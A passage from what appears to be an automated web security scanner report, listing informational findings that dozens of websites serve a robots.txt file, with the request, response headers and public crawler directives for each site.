27.573. http://www.fiba.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fiba.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fiba.com

Response

HTTP/1.0 200 OK
Content-Length: 541
Content-Type: text/plain
Cache-Control: max-age=600
Last-Modified: Tue, 19 Apr 2011 11:06:12 GMT
Accept-Ranges: bytes
ETag: "963e83cb81fecb1:1821"
Server: Microsoft-IIS/6.0
ServerNode: www-31
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:28:25 GMT
Age: 409
X-Cache: HIT from cache-32.fiba.com
X-Cache-Lookup: HIT from cache-32.fiba.com:80
Via: 1.1 cache-32.fiba.com:80 (squid/2.7.STABLE6)
Connection: close

User-agent: *
Disallow: /pages/eng/fe/11/facm/
Disallow: /pages/eng/fe/11/facw/
Disallow: /pages/esp/fe/11/facm/
Disallow: /pages/esp/fe/11/facw/
Disallow: /pages/esp/fe/11/fu19w/
Disallow: /pages/pri
...[SNIP]...

27.574. http://www.fileresearchcenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fileresearchcenter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fileresearchcenter.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:10:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.3
Last-Modified: Thu, 01 Jan 2004 01:00:01 GMT
ETag: "119d17-39-3cfd06001a640"
Accept-Ranges: bytes
Content-Length: 57
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /cgi-sys/

27.575. http://www.fileunemployment.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fileunemployment.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fileunemployment.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:46:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-UA-Compatible: IE=EmulateIE7
X-Pingback: http://fileunemployment.org/xmlrpc.php
Set-Cookie: PHPSESSID=all908vt4bmhi9llb4kc126n91; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://fileunemployment.org/sitemap.xml.gz

27.576. http://www.filipinokisses.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filipinokisses.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.filipinokisses.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:26:21 GMT
Server: Apache/2.2.15 (Linux/SUSE)
Last-Modified: Fri, 24 Apr 2009 22:00:00 GMT
ETag: "568210d-19e3-468541e325800"
Accept-Ranges: bytes
Content-Length: 6627
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Googlebot

Disallow: /search.php
Disallow: /mem_mailbox.php
Disallow: /send.php
Disallow: /mem_mystatus.php
Disallow: /mem_myaccount.php
Disallow: /mem_myfotos.php
Disallow: /mem_mypartner
...[SNIP]...

27.577. http://www.filmjunk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filmjunk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.filmjunk.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:29:15 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: PHPSESSID=q1kvdld641g1b4qcqt82tt5q72; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.filmjunk.com/cms/xmlrpc.php
Vary: User-Agent,Accept-Encoding
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.578. http://www.finanznachrichten.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.finanznachrichten.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.finanznachrichten.de

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: FN-Session=4ny11vzz2ly1hthkr20zveh1; domain=.finanznachrichten.de; path=/; HttpOnly
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 1058
Content-Length: 1058
Date: Wed, 04 May 2011 01:55:25 GMT
X-Varnish: 442624697
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

# robots.txt for http://www.finanznachrichten.de

Sitemap: http://www.finanznachrichten.de/sitemap-news/

User-agent: *
Disallow: /service/problembericht.htm
Disallow: /service/seitenbewertung.h
...[SNIP]...

27.579. http://www.find-a-bike.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.find-a-bike.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.find-a-bike.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:50:27 GMT
Server: Apache
Last-Modified: Fri, 12 Feb 2010 08:28:42 GMT
ETag: "5b6d03-5f-47f630e1b4280"
Accept-Ranges: bytes
Content-Length: 95
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin/
Disallow: /templates/
Disallow: /temp/
Disallow: periodic.php


27.580. http://www.finditandfundit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.finditandfundit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.finditandfundit.com

Response

HTTP/1.1 200 OK
Content-Length: 104
Content-Type: text/plain
Last-Modified: Tue, 18 Jan 2011 18:43:18 GMT
Accept-Ranges: bytes
ETag: "24b6a4923fb7cb1:471"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:06:10 GMT
Connection: close

# /robots.txt file for http://www.finditandfundit.com/

User-agent: *
Disallow: /tmp
Disallow: /logs

27.581. http://www.findmall.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findmall.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.findmall.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:49:47 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 03 Aug 2007 15:49:04 GMT
ETag: "3ca7fe-98-436cd7f9c7c00"
Accept-Ranges: bytes
Content-Length: 152
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /report.php
Disallow: /register.php
Disallow: /login.php
Disallow: /profile.php
Disallow: /control.php

27.582. http://www.findmydegree.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findmydegree.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.findmydegree.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 16 Oct 2009 18:15:20 GMT
Accept-Ranges: bytes
ETag: "06ccb9e8c4eca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:42:03 GMT
Connection: close
Content-Length: 33

...User-agent: *
Disallow: *.cmp

27.583. http://www.finn.no/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.finn.no
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.finn.no

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:35 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Wed, 19 Jan 2011 14:22:22 GMT
ETag: "517967a-48b0-49a33bedb0bb9"
Accept-Ranges: bytes
Content-Length: 18608
Vary: Accept-Encoding
P3P: CP="CURa CONi TELi OUR IND NID DSP CAO COR", policyref="http://www.finn.no/daily/w3c/p3p.xml"
Connection: close
Content-Type: text/plain
Set-Cookie: finnlb-?Finn-web?finnweb=JGCFFLFA; Expires=Fri, 03-Jun-2011 11:54:35 GMT; Path=/

User-agent: *
Disallow: /auximg/
Disallow: /finn/
Disallow: /finn
Disallow: /pal/
Disallow: /rest/

User-agent: googlebot
Allow: /finn/bap/
Allow: /finn/torget/
Allow: /finn/job/
Allow: /fi
...[SNIP]...

27.584. http://www.firehow.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firehow.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.firehow.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:19:45 GMT
Server: Apache
Last-Modified: Thu, 27 May 2010 23:52:05 GMT
Accept-Ranges: bytes
Content-Length: 388
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /m
...[SNIP]...

27.585. http://www.firerescue1.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firerescue1.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.firerescue1.com

Response

HTTP/1.0 200 OK
Content-Length: 349
Content-Type: text/plain
Last-Modified: Fri, 29 Aug 2008 19:16:27 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:35:41 GMT
Connection: close

User-agent: *
Disallow: /test/

User-Agent: Googlebot
Disallow: /ad/

User-agent: MSNBot
Disallow: /ad/

User-agent: Slurp
Disallow: /ad/

User-agent: ia_archiver
Disallow: /ad/

User-a
...[SNIP]...

27.586. http://www.firstamendmentcenter.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstamendmentcenter.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.firstamendmentcenter.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:24:06 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.firstamendmentcenter.org/madison/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.firstamendmentcenter.org/sitemap.xml.gz

27.587. http://www.firstbankonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.firstbankonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.firstbankonline.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:46:10 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 14 Dec 2009 12:12:19 GMT
ETag: "2a8a3b-11d-2f57eec0"
Accept-Ranges: bytes
Content-Length: 285
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /media/
Disallow: /m
...[SNIP]...

27.588. http://www.fiserv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fiserv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fiserv.com

Response

HTTP/1.1 200 OK
Content-Length: 39
Content-Type: text/plain
Last-Modified: Wed, 16 Jun 2010 14:30:33 GMT
Accept-Ranges: bytes
ETag: "8ab0d37a60dcb1:13ba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:42:10 GMT
Connection: close

User-Agent: *
Allow: /
Disallow:/print/

27.589. http://www.fitnessandfreebies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fitnessandfreebies.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fitnessandfreebies.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:44:00 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 16:53:49 GMT
ETag: "18649dc-d0-4db5a71d"
Accept-Ranges: bytes
Content-Length: 208
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Sitemap: http://www.fitnessandfreebies.com/urllist.txt
Disallow: /sexual_health/
Disallow: /report/ezinerecipes.html
Disallow: /report/gfthankyou.html
Disallow:
...[SNIP]...

27.590. http://www.fix-error.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fix-error.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fix-error.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:54:59 GMT
Server: Apache
Last-Modified: Tue, 06 Apr 2010 14:15:54 GMT
ETag: "d73c00c-3b-4839215613a80"
Accept-Ranges: bytes
Content-Length: 59
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /scan.php
Disallow: /download.php


27.591. http://www.flashanywhere.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flashanywhere.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flashanywhere.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:35:55 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 15 May 2008 02:51:53 GMT
ETag: "43408b9-cc-44d3bfacd2440"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

27.592. http://www.flashcardexchange.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flashcardexchange.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flashcardexchange.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:14:07 GMT
Server: Apache/2.2.11 (FreeBSD) mod_ssl/2.2.11 OpenSSL/0.9.8e DAV/2 PHP/5.2.10 with Suhosin-Patch mod_python/3.3.1 Python/2.6.2
Last-Modified: Fri, 20 Feb 2009 12:58:40 GMT
ETag: "4ba5ff-1a0-46359363c4000"
Accept-Ranges: bytes
Content-Length: 416
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /clipboard
Disallow: /create
Disallow: /export
Disallow: /print_pdf
Disallow: /cardfiles
Disallow: /addfavorite
Disallow: /study
Disallow: /search
Disallow: /mycards
Disallow:
...[SNIP]...

27.593. http://www.flashedition.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flashedition.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flashedition.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Wed, 04 May 2011 00:59:27 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
P3P: policyref="/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAo PSDo CONo TELo OUR DELo SAMo OTRo BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Set-Cookie: PHPSESSID=q5g2k67p5vr38kk7s4tk3ur7v7; expires=Wed, 04-May-2011 04:59:27 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: u_id=q5g2k67p5vr38kk7s4tk3ur7v7; expires=Thu, 03-May-2012 00:59:27 GMT
Vary: Accept-Encoding
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

/sitemap.xml

#Unsafe robots to keep away
###

User-agent: *
Disallow: /reports/


Disallow: /publication*?*i=5642*
Disallow: /publication*?i=5642*
Disallow: /publication/?i=5642*
Disallow: /publicati
...[SNIP]...

27.594. http://www.flashflashrevolution.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flashflashrevolution.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flashflashrevolution.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:30:33 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: close
ETag: "18-4d691380-0"
Last-Modified: Sat, 26 Feb 2011 14:51:44 GMT
Content-Type: text/plain
Content-Length: 24

User-Agent: *
Allow: /


27.595. http://www.floppingaces.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floppingaces.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.floppingaces.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:03:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 29 Jan 2011 18:12:34 GMT
ETag: "eb821c-9c-2079c880"
Accept-Ranges: bytes
Content-Length: 156
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://www.floppingaces.net/sitemap.xml.gz
# END XML-SITEMAP-PLUGIN

27.596. http://www.florida-sportsman-hunting.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.florida-sportsman-hunting.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.florida-sportsman-hunting.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:36:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://florida-sportsman-hunting.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Vary: Accept-Encoding
Pragma: public
X-Powered-By: W3 Total Cache/0.8.5.2
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
Sitemap: http://florida-sportsman-hunting.com/sitemap.xml.gz

27.597. http://www.floridaoilspilllaw.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.floridaoilspilllaw.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.floridaoilspilllaw.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Wed, 04 May 2011 01:00:00 GMT
Content-Type: text/plain; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.6-1+lenny8
Vary: Cookie,Accept-Encoding
Set-Cookie: PHPSESSID=eA3sdVqK1WwYDLZc3Iw85XxBy%2C6; path=/
X-Pingback: http://www.floridaoilspilllaw.com/xmlrpc.php

User-agent: *
Disallow:

Sitemap: http://www.floridaoilspilllaw.com/sitemap.xml.gz

27.598. http://www.fluor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fluor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fluor.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Mon, 20 Sep 2010 08:33:48 GMT
Accept-Ranges: bytes
ETag: "54e8be8b9e58cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6421
Date: Wed, 04 May 2011 01:57:14 GMT
Connection: close
Content-Length: 35

User-agent: *
Disallow: /_layouts/

27.599. http://www.focus.de/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.focus.de
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.focus.de

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:17:47 GMT
Server: Apache
Last-Modified: Wed, 30 Mar 2011 09:04:57 GMT
ETag: "79d695-ad6-4d92f239"
Accept-Ranges: bytes
Content-Length: 2774
Connection: close
Content-Type: text/plain

# robots.txt for http:www.focus.de .
# Gibt an, welche Unterverzeichnisse nicht durch Crawler durchsucht werden sollen

User-agent: *
Disallow: /ERRORS/ # Fehler-Seiten
Disallow: /test/ # Test
...[SNIP]...

27.600. http://www.foe.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foe.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foe.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:34:42 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 03 Dec 2010 04:08:29 GMT
ETag: "720131-636-49679b0d80940"
Accept-Ranges: bytes
Content-Length: 1590
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.601. http://www.fogu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fogu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fogu.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:07:13 GMT
Server: Apache
Last-Modified: Sat, 25 Jul 2009 19:33:52 GMT
ETag: "3513807c-240-46f8cccfbc800"
Accept-Ranges: bytes
Content-Length: 576
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /photos/
Disallow: /hm5/img/
Disallow: /hm/goodies/
Disallow: /hm4/img/
Disallow: /hm4/sav/
Disallow: /rk3/img/
Disallow: /hm1/img/
...[SNIP]...

27.602. http://www.folgers.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.folgers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.folgers.com

Response

HTTP/1.1 200 OK
Content-Length: 251
Content-Type: text/plain
Last-Modified: Mon, 15 Nov 2010 18:05:42 GMT
Accept-Ranges: bytes
ETag: "0df72b7ef84cb1:3d4f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:18:14 GMT
Connection: close

...User-agent: *
Disallow: /admin/
Disallow: /bin/
Disallow: /css/
Disallow: /flash/
Disallow: /images/
Disallow: /jscript/
Disallow: /lib/
Disallow: /obj/
Disallow: /swf/
Disallow: /user-co
...[SNIP]...

27.603. http://www.fommy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fommy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fommy.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Expires: Tue, 30 Nov 2010 00:00:00 GMT
Last-Modified: Wed, 08 Oct 2008 07:02:04 GMT
Accept-Ranges: bytes
ETag: "54741ac51329c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:43:08 GMT
Connection: close
Content-Length: 115

User-agent: *
Disallow: /compatiability.asp
Disallow: /ShowVideo.php

Sitemap: http://www.fommy.com/sitemap.xml

27.604. http://www.foodinsurance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foodinsurance.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foodinsurance.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:02:02 GMT
Connection: close
Content-Type: text/html
Content-Length: 112

User-agent: *
Sitemap: sitemap.xml
Allow: /
Disallow: /dev
Disallow: /resources
Disallow: /affiliate_program/old

27.605. http://www.foodsafetynews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foodsafetynews.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foodsafetynews.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:32:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 02 Oct 2010 23:06:18 GMT
ETag: "1e025696-1d3-491aa5bd50e80"
Accept-Ranges: bytes
Content-Length: 467
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.foodsafetynews.com/sitemap.xml

User-agent: *
# disallow all files in these directories
Disallow: /cgi-bin/
Disallow: /admin/
Disallow: /mt-static/
Disallow: /stats/

User-agent:
...[SNIP]...

27.606. http://www.foofighters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foofighters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foofighters.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:07 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 20 Jan 2011 19:04:20 GMT
ETag: "45cef4-9f6-49a4bcd093500"
Accept-Ranges: bytes
Content-Length: 2550
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:27:07 GMT
P3P: CP=HONK
Connection: close
Content-Type: text/plain; charset=UTF-8

# $Id: robots.txt,v 1.9.2.2 2010/09/06 10:37:16 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.607. http://www.footfactory.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footfactory.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.footfactory.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:15:19 GMT
Server: Apache/1.3.41 (Unix)
Last-Modified: Sat, 11 Mar 2006 18:59:34 GMT
ETag: "ebc203-32-44131e16"
Accept-Ranges: bytes
Content-Length: 50
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /admin
Disallow: /members

27.608. http://www.fordviewpoint.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fordviewpoint.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fordviewpoint.com

Response

HTTP/1.1 200 OK
Content-Length: 30
Content-Type: text/plain
Last-Modified: Thu, 10 May 2007 11:11:51 GMT
Accept-Ranges: bytes
ETag: "2994882f492c71:313"
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:52:16 GMT
Connection: close

User-agent: *
Disallow: /


27.609. http://www.foreca.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foreca.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foreca.com

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/plain
Last-Modified: Thu, 21 Oct 2010 09:21:39 GMT
Expires: Wed, 04 May 2011 13:31:17 GMT
Cache-Control: max-age=86400
Content-Length: 47
Date: Wed, 04 May 2011 01:40:37 GMT
X-Varnish: 382461017 377506528
Age: 43760
Via: 1.1 varnish
Connection: close

User-agent: *
Allow: /
Disallow: /complete.php

27.610. http://www.foreclosed-government-homes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foreclosed-government-homes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foreclosed-government-homes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:24:01 GMT
